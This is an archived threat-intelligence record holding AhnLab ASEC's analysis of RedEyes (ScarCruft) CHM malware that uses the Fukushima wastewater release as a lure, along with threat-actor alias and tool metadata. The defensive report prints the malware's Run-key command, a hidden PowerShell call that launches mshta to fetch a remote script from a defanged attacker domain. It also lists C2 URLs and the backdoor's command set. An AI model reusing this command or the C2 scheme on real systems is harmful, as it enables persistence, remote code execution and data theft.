{
	"id": "e413c0aa-3d9b-4253-a5be-198d21b28fac",
	"created_at": "2026-04-06T00:06:35.22026Z",
	"updated_at": "2026-04-10T03:38:06.308367Z",
	"deleted_at": null,
	"sha1_hash": "fa4e301dec9716a95a79b83e614cd411330b9219",
	"title": "RedEyes (ScarCruft)’s CHM Malware Using the Topic of Fukushima Wastewater Release - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1147237,
	"plain_text": "RedEyes (ScarCruft)’s CHM Malware Using the Topic of Fukushima Wastewater Release - ASEC\r\nBy ATCP\r\nPublished: 2023-09-03 · Archived: 2026-04-05 19:10:03 UTC\r\n\r\nThe AhnLab Security Emergency response Center (ASEC) analysis team has recently discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group, is being distributed again. The CHM malware in distribution operates in a similar way to the “CHM Malware Disguised as Security Email from a Korean Financial Company”[1] covered in March of this year and also uses the same commands used in the “2.3. Persistence”[2] stage in the attack process of the RedEyes group’s M2RAT malware.\r\n\r\nThe recent attack used information regarding the release of Fukushima wastewater. By using such a spotlight issue in Korea, the threat actor provokes the user’s curiosity and leads them to open the malicious file. Information about this issue can be seen in the help file window generated when the CHM malware is executed, as shown in Figure 1.\r\n\r\nhttps://asec.ahnlab.com/en/56857/\r\nPage 1 of 5\r\n\r\nFigure 2 shows the malicious script that operates during this process. The mshta command used to be executed directly by the CHM file (hh.exe), but the recently distributed file registers the command to the RUN key, enabling it to be run when the system reboots.\r\n\r\nRUN key registration\r\nRegistry path: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue name: fGZtm\r\nValue: c:\\windows\\system32\\cmd.exe /c Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta hxxp://navercorp[.]ru/dashboard/image/202302/4.html\r\n\r\nWhen the command registered to the RUN key is executed, an additional script at a certain URL runs through mshta. The said URL contains JavaScript (JS) code. This code is responsible for executing an encoded PowerShell command. This process is similar in structure to the commands used in the attack process of the previously covered CHM malware and M2RAT malware.\r\n\r\nThe decoded PowerShell command is a backdoor responsible for registering the RUN key to establish persistence, receiving commands from the threat actor’s server, and transmitting the command execution results. According to the commands it receives from the threat actor’s server, it can perform various malicious behaviors such as uploading/downloading files, transmitting information on specific files, and editing the registry.\r\n\r\nC2\r\nhxxp://navercorp[.]ru/dashboard/image/202302/com.php?U=[Computer name]-[User name] // Receive the threat actor’s command\r\nhxxp://navercorp[.]ru/dashboard/image/202302/com.php?R=[BASE64 encoding] // Transmit the command execution results\r\n\r\nCommand | Feature\r\nfileinfo | Saves the list of files and their properties (name, size, last modified time) in a certain path as CSV, transmits this file to the C2 server, then deletes it from the local system\r\ndir | Compresses folders in a certain path, transmits them to the C2 server, then deletes them from the local system\r\nfile | Sends (uploads) a certain file to the C2 server\r\ndown | Downloads files in a certain path\r\nregedit | Edits the registry\r\ntask | Adds a task to the Task Scheduler to be run repeatedly at 10-minute intervals\r\nzip | Decompresses a compressed file in a certain path\r\nrename | Changes the name of a certain file\r\ndel | Deletes files in a certain path\r\nTable 1. List of commands received\r\n\r\nWhen a system is infected with this type of malware, the system can suffer great damage since this malware is capable of performing various malicious acts such as downloading additional files and breaching data according to the threat actor’s commands. In particular, malware that targets users in Korea may include information on topics of interest to the user to encourage them to execute the malware, so users should refrain from opening emails from unknown sources and should not execute their attachments. Users should also regularly scan their PCs and update their security products to the latest engine.\r\n\r\n[File Detection]\r\nDownloader/CHM.Generic (2023.09.02.00)\r\n\r\nMD5\r\n52f71fadf0ea5ffacd753e83a3d0af1a\r\nAdditional IOCs are available on AhnLab TIP.\r\n\r\nURL\r\nhttp[:]//navercorp[.]ru/dashboard/image/202302/4[.]html\r\nhttp[:]//navercorp[.]ru/dashboard/image/202302/com[.]php\r\nAdditional IOCs are available on AhnLab TIP.\r\n\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.\r\nSource: https://asec.ahnlab.com/en/56857/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/56857/"
	],
	"report_names": [
		"56857"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433995,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fa4e301dec9716a95a79b83e614cd411330b9219.pdf",
		"text": "https://archive.orkl.eu/fa4e301dec9716a95a79b83e614cd411330b9219.txt",
		"img": "https://archive.orkl.eu/fa4e301dec9716a95a79b83e614cd411330b9219.jpg"
	}
}